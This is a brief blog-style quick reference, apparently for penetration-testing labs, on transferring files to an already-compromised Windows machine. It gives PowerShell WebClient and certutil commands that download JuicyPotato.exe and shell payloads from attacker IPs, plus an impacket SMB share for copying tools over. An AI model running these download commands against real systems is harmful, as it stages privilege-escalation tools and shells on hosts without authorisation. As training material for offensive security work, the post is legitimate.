There are various ways to transfer files from your Kali machine to a Windows machine where you already have a shell. This is my quick reference for some of those methods.

PowerShell

If you have a PowerShell shell, you can use it to pull files from your Kali box, provided you have the simple HTTP server running:
IEX(new-object net.webclient).downloadfile(‘http://10.10.14.7:5555/JuicyPotato.exe’, ‘C:\Users\kohsuke\Desktop\jp.exe’)

Another way, from the Windows target: powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://[your_ip]:[listening_port]/[shell_name.exe]’)”

SMB Server

From your Kali machine: impacket-smbserver <share name> <share path>

Then, from your Windows machine (where you already have a shell) you need to connect to the share: net use \\<Kali IP>\<share path>

From here, you should be able to just copy the files over: copy \\<KALI IP>\<share path>\<file name>

NOTE: There are times where SMB may crash on your Kali box and when you re-run it you get the error: Address already in use. To fix this, you can type netstat -tlpen to verify that something is using port 445, and then fuser -k 445/tcp to release the port, then start your SMB server back up:

CertUtil

If available on the Windows machine CertUtil is a great way to transfer files. You’ll need the file you want copied over sitting in the same directory you have your Python SimpleHTTPServer running:

certutil.exe -urlcache -split -f http://10.10.14.40/shell.bat shell.bat

Leave a Reply

Your email address will not be published. Required fields are marked *